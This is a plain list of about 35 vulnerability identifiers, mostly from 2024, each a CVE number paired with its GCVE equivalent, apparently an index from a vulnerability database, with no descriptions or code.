CVE-2024-42093 (GCVE-0-2024-42093)

CVE-2024-43880 (GCVE-0-2024-43880)

CVE-2024-46675 (GCVE-0-2024-46675)

CVE-2024-42140 (GCVE-0-2024-42140)

CVE-2024-41068 (GCVE-0-2024-41068)

CVE-2024-26636 (GCVE-0-2024-26636)

CVE-2024-41091 (GCVE-0-2024-41091)

CVE-2024-41007 (GCVE-0-2024-41007)

CVE-2024-41061 (GCVE-0-2024-41061)

CVE-2024-42289 (GCVE-0-2024-42289)

CVE-2024-41072 (GCVE-0-2024-41072)

CVE-2024-41082 (GCVE-0-2024-41082)

CVE-2024-41080 (GCVE-0-2024-41080)

CVE-2024-38637 (GCVE-0-2024-38637)

CVE-2024-42225 (GCVE-0-2024-42225)

CVE-2024-41012 (GCVE-0-2024-41012)

CVE-2024-42236 (GCVE-0-2024-42236)

CVE-2024-46737 (GCVE-0-2024-46737)

CVE-2024-41093 (GCVE-0-2024-41093)

CVE-2024-44989 (GCVE-0-2024-44989)

CVE-2024-44947 (GCVE-0-2024-44947)

CVE-2024-44983 (GCVE-0-2024-44983)

CVE-2024-42119 (GCVE-0-2024-42119)

CVE-2024-42095 (GCVE-0-2024-42095)

CVE-2024-42157 (GCVE-0-2024-42157)

CVE-2024-41078 (GCVE-0-2024-41078)

CVE-2024-45007 (GCVE-0-2024-45007)

CVE-2024-42115 (GCVE-0-2024-42115)

CVE-2023-52612 (GCVE-0-2023-52612)

CVE-2024-38577 (GCVE-0-2024-38577)

CVE-2024-42304 (GCVE-0-2024-42304)

CVE-2024-42265 (GCVE-0-2024-42265)

CVE-2024-27397 (GCVE-0-2024-27397)

CVE-2024-43894 (GCVE-0-2024-43894)

CVE-2024-42161 (GCVE-0-2024-42161)